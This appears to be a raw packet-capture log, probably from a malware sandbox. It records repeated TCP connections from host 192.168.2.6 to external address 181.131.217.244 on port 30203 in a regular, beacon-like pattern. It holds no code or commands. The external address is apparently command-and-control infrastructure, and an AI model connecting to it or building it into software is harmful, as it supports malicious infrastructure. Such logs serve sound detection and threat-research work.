Dec 12, 2024 17:36:21.352698088 CET	30203	50037	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:22.537938118 CET	30203	50037	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:22.538077116 CET	50037	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:22.538786888 CET	50037	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:22.648628950 CET	50042	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:22.658670902 CET	30203	50037	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:22.768423080 CET	30203	50042	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:22.768520117 CET	50042	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:22.769372940 CET	50042	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:22.892174959 CET	30203	50042	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:22.892250061 CET	50042	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:23.012049913 CET	30203	50042	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:23.226223946 CET	50042	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:23.346106052 CET	30203	50042	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:23.346277952 CET	50042	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:23.466676950 CET	30203	50042	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:24.135386944 CET	30203	50042	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:24.135442972 CET	50042	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:24.135602951 CET	50042	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:24.241939068 CET	50047	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:24.259377003 CET	30203	50042	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:24.362308025 CET	30203	50047	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:24.362399101 CET	50047	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:24.363425016 CET	50047	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:24.483072996 CET	30203	50047	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:24.483118057 CET	50047	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:24.602955103 CET	30203	50047	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:25.751251936 CET	30203	50047	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:25.751360893 CET	50047	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:25.751607895 CET	50047	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:25.867151976 CET	50050	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:25.871346951 CET	30203	50047	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:25.987169981 CET	30203	50050	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:25.987242937 CET	50050	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:25.988363981 CET	50050	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:26.108026028 CET	30203	50050	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:26.108113050 CET	50050	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:26.228298903 CET	30203	50050	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:27.337153912 CET	30203	50050	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:27.337256908 CET	50050	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:27.337438107 CET	50050	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:27.445286989 CET	50051	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:27.459273100 CET	30203	50050	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:27.565264940 CET	30203	50051	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:27.565474987 CET	50051	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:27.566416025 CET	50051	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:27.686192036 CET	30203	50051	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:27.686279058 CET	50051	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:27.807440042 CET	30203	50051	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:29.124737024 CET	30203	50051	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:29.129054070 CET	50051	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:29.129054070 CET	50051	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:29.242177963 CET	50053	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:29.249018908 CET	30203	50051	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:29.362103939 CET	30203	50053	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:29.365673065 CET	50053	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:29.365673065 CET	50053	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:29.487431049 CET	30203	50053	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:29.492901087 CET	50053	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:29.612942934 CET	30203	50053	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:30.735482931 CET	30203	50053	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:30.735578060 CET	50053	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:30.735894918 CET	50053	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:30.851639986 CET	50054	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:30.855892897 CET	30203	50053	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:30.971653938 CET	30203	50054	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:30.971822023 CET	50054	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:30.972913027 CET	50054	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:31.092590094 CET	30203	50054	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:31.092740059 CET	50054	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:31.212642908 CET	30203	50054	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:32.397458076 CET	30203	50054	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:32.397543907 CET	50054	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:32.397769928 CET	50054	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:32.508202076 CET	50055	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:32.517651081 CET	30203	50054	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:32.628089905 CET	30203	50055	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:32.628899097 CET	50055	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:32.632716894 CET	50055	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:32.752545118 CET	30203	50055	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:32.752630949 CET	50055	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:32.872512102 CET	30203	50055	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:34.006000042 CET	30203	50055	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:34.006082058 CET	50055	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:34.006314039 CET	50055	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:34.117472887 CET	50056	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:34.126025915 CET	30203	50055	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:34.237457037 CET	30203	50056	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:34.237548113 CET	50056	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:34.238667011 CET	50056	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:34.358544111 CET	30203	50056	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:34.358618975 CET	50056	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:34.485105038 CET	30203	50056	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:35.539294958 CET	50056	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:35.659774065 CET	30203	50056	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:35.659984112 CET	50056	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:35.785734892 CET	30203	50056	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:35.859534025 CET	30203	50056	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:35.859591007 CET	50056	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:35.859811068 CET	50056	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:35.976743937 CET	50057	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:35.979594946 CET	30203	50056	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:36.096738100 CET	30203	50057	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:36.096824884 CET	50057	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:36.097925901 CET	50057	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:36.217730999 CET	30203	50057	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:36.217906952 CET	50057	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:36.337807894 CET	30203	50057	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:37.606066942 CET	30203	50057	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:37.606163979 CET	50057	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:37.606404066 CET	50057	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:37.710880041 CET	50058	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:37.726938009 CET	30203	50057	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:37.830872059 CET	30203	50058	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:37.831032991 CET	50058	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:37.831856966 CET	50058	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:37.951766968 CET	30203	50058	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:37.951900959 CET	50058	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:38.071775913 CET	30203	50058	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:42.343194008 CET	30203	50058	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:42.343269110 CET	50058	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:42.343875885 CET	50058	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:42.461088896 CET	50059	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:42.463607073 CET	30203	50058	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:42.583039045 CET	30203	50059	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:42.591335058 CET	50059	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:42.592823029 CET	50059	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:42.713263988 CET	30203	50059	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:42.717596054 CET	50059	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:42.838269949 CET	30203	50059	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:43.867207050 CET	50059	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:43.987982988 CET	30203	50059	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:43.988142967 CET	50059	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:43.989439011 CET	30203	50059	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:43.989588976 CET	50059	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:43.989954948 CET	50059	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:44.101540089 CET	50060	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:44.107911110 CET	30203	50059	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:44.109369040 CET	30203	50059	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:44.109772921 CET	30203	50059	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:44.223449945 CET	30203	50060	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:44.223536015 CET	50060	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:44.224415064 CET	50060	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:44.353817940 CET	30203	50060	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:44.353940010 CET	50060	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:44.474976063 CET	30203	50060	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:45.641096115 CET	30203	50060	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:45.641161919 CET	50060	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:45.641705990 CET	50060	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:45.757920027 CET	50061	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:45.762200117 CET	30203	50060	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:45.878453016 CET	30203	50061	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:45.878534079 CET	50061	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:45.879673958 CET	50061	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:45.999970913 CET	30203	50061	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:46.000029087 CET	50061	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:46.121165991 CET	30203	50061	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:50.267693043 CET	30203	50061	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:50.267774105 CET	50061	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:50.267914057 CET	50061	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:50.385569096 CET	50062	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:50.389796019 CET	30203	50061	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:50.508362055 CET	30203	50062	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:50.508475065 CET	50062	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:50.509790897 CET	50062	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:50.629841089 CET	30203	50062	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:50.629905939 CET	50062	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:50.749855995 CET	30203	50062	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:51.988399982 CET	30203	50062	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:51.988464117 CET	50062	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:51.988631010 CET	50062	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:52.101634026 CET	50063	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:52.108426094 CET	30203	50062	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:52.221514940 CET	30203	50063	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:52.221589088 CET	50063	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:52.222521067 CET	50063	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:52.342421055 CET	30203	50063	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:52.342482090 CET	50063	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:52.554356098 CET	30203	50063	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:55.898509979 CET	50063	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:56.019756079 CET	30203	50063	181.131.217.244	192.168.2.6
Dec 12, 2024 17:36:56.019813061 CET	50063	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:36:56.139606953 CET	30203	50063	181.131.217.244	192.168.2.6
Dec 12, 2024 17:37:09.835833073 CET	50063	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:09.956980944 CET	30203	50063	181.131.217.244	192.168.2.6
Dec 12, 2024 17:37:09.957060099 CET	50063	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:10.077580929 CET	30203	50063	181.131.217.244	192.168.2.6
Dec 12, 2024 17:37:14.234059095 CET	30203	50063	181.131.217.244	192.168.2.6
Dec 12, 2024 17:37:14.234925985 CET	50063	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:14.235044956 CET	50063	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:14.351533890 CET	50064	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:14.356223106 CET	30203	50063	181.131.217.244	192.168.2.6
Dec 12, 2024 17:37:14.471415997 CET	30203	50064	181.131.217.244	192.168.2.6
Dec 12, 2024 17:37:14.475488901 CET	50064	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:14.479376078 CET	50064	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:14.599476099 CET	30203	50064	181.131.217.244	192.168.2.6
Dec 12, 2024 17:37:14.599536896 CET	50064	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:14.719485998 CET	30203	50064	181.131.217.244	192.168.2.6
Dec 12, 2024 17:37:18.815906048 CET	30203	50064	181.131.217.244	192.168.2.6
Dec 12, 2024 17:37:18.815984964 CET	50064	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:18.816167116 CET	50064	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:18.929810047 CET	50065	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:18.938637972 CET	30203	50064	181.131.217.244	192.168.2.6
Dec 12, 2024 17:37:19.049746990 CET	30203	50065	181.131.217.244	192.168.2.6
Dec 12, 2024 17:37:19.049838066 CET	50065	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:19.051140070 CET	50065	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:19.175240040 CET	30203	50065	181.131.217.244	192.168.2.6
Dec 12, 2024 17:37:19.175304890 CET	50065	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:19.295783043 CET	30203	50065	181.131.217.244	192.168.2.6
Dec 12, 2024 17:37:20.442842007 CET	30203	50065	181.131.217.244	192.168.2.6
Dec 12, 2024 17:37:20.442938089 CET	50065	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:20.443110943 CET	50065	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:20.555347919 CET	50066	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:20.563399076 CET	30203	50065	181.131.217.244	192.168.2.6
Dec 12, 2024 17:37:20.675646067 CET	30203	50066	181.131.217.244	192.168.2.6
Dec 12, 2024 17:37:20.675726891 CET	50066	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:20.676588058 CET	50066	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:20.797084093 CET	30203	50066	181.131.217.244	192.168.2.6
Dec 12, 2024 17:37:20.797143936 CET	50066	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:20.916924000 CET	30203	50066	181.131.217.244	192.168.2.6
Dec 12, 2024 17:37:21.288932085 CET	50066	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:21.409347057 CET	30203	50066	181.131.217.244	192.168.2.6
Dec 12, 2024 17:37:21.409440994 CET	50066	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:21.529539108 CET	30203	50066	181.131.217.244	192.168.2.6
Dec 12, 2024 17:37:29.164819956 CET	50066	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:29.284878969 CET	30203	50066	181.131.217.244	192.168.2.6
Dec 12, 2024 17:37:29.290906906 CET	50066	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:29.410784006 CET	30203	50066	181.131.217.244	192.168.2.6
Dec 12, 2024 17:37:39.072829962 CET	50066	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:39.192643881 CET	30203	50066	181.131.217.244	192.168.2.6
Dec 12, 2024 17:37:39.195367098 CET	50066	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:39.316854000 CET	30203	50066	181.131.217.244	192.168.2.6
Dec 12, 2024 17:37:39.317137957 CET	50066	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:39.437098980 CET	30203	50066	181.131.217.244	192.168.2.6
Dec 12, 2024 17:37:42.593966961 CET	30203	50066	181.131.217.244	192.168.2.6
Dec 12, 2024 17:37:42.594039917 CET	50066	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:42.594286919 CET	50066	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:42.711061001 CET	50067	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:42.714109898 CET	30203	50066	181.131.217.244	192.168.2.6
Dec 12, 2024 17:37:42.830874920 CET	30203	50067	181.131.217.244	192.168.2.6
Dec 12, 2024 17:37:42.832976103 CET	50067	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:42.836828947 CET	50067	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:42.956626892 CET	30203	50067	181.131.217.244	192.168.2.6
Dec 12, 2024 17:37:42.956909895 CET	50067	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:43.076637983 CET	30203	50067	181.131.217.244	192.168.2.6
Dec 12, 2024 17:37:44.380984068 CET	30203	50067	181.131.217.244	192.168.2.6
Dec 12, 2024 17:37:44.381134987 CET	50067	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:44.396178961 CET	50067	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:44.515907049 CET	30203	50067	181.131.217.244	192.168.2.6
Dec 12, 2024 17:37:44.584888935 CET	50068	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:44.704766035 CET	30203	50068	181.131.217.244	192.168.2.6
Dec 12, 2024 17:37:44.704864025 CET	50068	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:44.706484079 CET	50068	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:44.826350927 CET	30203	50068	181.131.217.244	192.168.2.6
Dec 12, 2024 17:37:44.826527119 CET	50068	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:44.946407080 CET	30203	50068	181.131.217.244	192.168.2.6
Dec 12, 2024 17:37:46.072989941 CET	30203	50068	181.131.217.244	192.168.2.6
Dec 12, 2024 17:37:46.073057890 CET	50068	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:46.073247910 CET	50068	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:46.180799007 CET	50069	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:46.193330050 CET	30203	50068	181.131.217.244	192.168.2.6
Dec 12, 2024 17:37:46.301357985 CET	30203	50069	181.131.217.244	192.168.2.6
Dec 12, 2024 17:37:46.301479101 CET	50069	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:46.302530050 CET	50069	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:46.422451019 CET	30203	50069	181.131.217.244	192.168.2.6
Dec 12, 2024 17:37:46.422568083 CET	50069	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:46.542381048 CET	30203	50069	181.131.217.244	192.168.2.6
Dec 12, 2024 17:37:53.024806976 CET	50069	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:53.145457029 CET	30203	50069	181.131.217.244	192.168.2.6
Dec 12, 2024 17:37:53.145632029 CET	50069	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:53.265592098 CET	30203	50069	181.131.217.244	192.168.2.6
Dec 12, 2024 17:37:56.705878019 CET	30203	50069	181.131.217.244	192.168.2.6
Dec 12, 2024 17:37:56.707326889 CET	50069	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:56.710200071 CET	50069	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:56.823354959 CET	50071	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:56.830310106 CET	30203	50069	181.131.217.244	192.168.2.6
Dec 12, 2024 17:37:56.943587065 CET	30203	50071	181.131.217.244	192.168.2.6
Dec 12, 2024 17:37:56.945548058 CET	50071	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:56.948820114 CET	50071	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:57.069468021 CET	30203	50071	181.131.217.244	192.168.2.6
Dec 12, 2024 17:37:57.070264101 CET	50071	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:57.190311909 CET	30203	50071	181.131.217.244	192.168.2.6
Dec 12, 2024 17:37:57.976730108 CET	50071	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:58.096725941 CET	30203	50071	181.131.217.244	192.168.2.6
Dec 12, 2024 17:37:58.096832991 CET	50071	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:58.218863010 CET	30203	50071	181.131.217.244	192.168.2.6
Dec 12, 2024 17:37:58.303471088 CET	30203	50071	181.131.217.244	192.168.2.6
Dec 12, 2024 17:37:58.303617001 CET	50071	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:58.309022903 CET	50071	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:58.428752899 CET	30203	50071	181.131.217.244	192.168.2.6
Dec 12, 2024 17:37:58.446589947 CET	50072	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:58.566828012 CET	30203	50072	181.131.217.244	192.168.2.6
Dec 12, 2024 17:37:58.566982985 CET	50072	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:58.568079948 CET	50072	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:58.687933922 CET	30203	50072	181.131.217.244	192.168.2.6
Dec 12, 2024 17:37:58.688014030 CET	50072	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:58.807991028 CET	30203	50072	181.131.217.244	192.168.2.6
Dec 12, 2024 17:37:59.961170912 CET	30203	50072	181.131.217.244	192.168.2.6
Dec 12, 2024 17:37:59.961251974 CET	50072	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:37:59.961513042 CET	50072	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:38:00.070729017 CET	50073	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:38:00.081312895 CET	30203	50072	181.131.217.244	192.168.2.6
Dec 12, 2024 17:38:00.191445112 CET	30203	50073	181.131.217.244	192.168.2.6
Dec 12, 2024 17:38:00.191525936 CET	50073	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:38:00.192574978 CET	50073	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:38:00.312731981 CET	30203	50073	181.131.217.244	192.168.2.6
Dec 12, 2024 17:38:00.312798023 CET	50073	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:38:00.432960033 CET	30203	50073	181.131.217.244	192.168.2.6
Dec 12, 2024 17:38:01.626332998 CET	30203	50073	181.131.217.244	192.168.2.6
Dec 12, 2024 17:38:01.627547979 CET	50073	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:38:01.627547979 CET	50073	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:38:01.742526054 CET	50074	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:38:01.747508049 CET	30203	50073	181.131.217.244	192.168.2.6
Dec 12, 2024 17:38:01.865500927 CET	30203	50074	181.131.217.244	192.168.2.6
Dec 12, 2024 17:38:01.865612984 CET	50074	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:38:01.866889000 CET	50074	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:38:01.990068913 CET	30203	50074	181.131.217.244	192.168.2.6
Dec 12, 2024 17:38:01.990135908 CET	50074	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:38:02.112530947 CET	30203	50074	181.131.217.244	192.168.2.6
Dec 12, 2024 17:38:03.427573919 CET	30203	50074	181.131.217.244	192.168.2.6
Dec 12, 2024 17:38:03.427721024 CET	50074	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:38:03.427867889 CET	50074	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:38:03.540642977 CET	50075	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:38:03.548378944 CET	30203	50074	181.131.217.244	192.168.2.6
Dec 12, 2024 17:38:03.660536051 CET	30203	50075	181.131.217.244	192.168.2.6
Dec 12, 2024 17:38:03.660665989 CET	50075	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:38:03.661626101 CET	50075	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:38:03.781524897 CET	30203	50075	181.131.217.244	192.168.2.6
Dec 12, 2024 17:38:03.781584978 CET	50075	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:38:03.901449919 CET	30203	50075	181.131.217.244	192.168.2.6
Dec 12, 2024 17:38:08.005239964 CET	30203	50075	181.131.217.244	192.168.2.6
Dec 12, 2024 17:38:08.005306959 CET	50075	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:38:08.005508900 CET	50075	30203	192.168.2.6	181.131.217.244
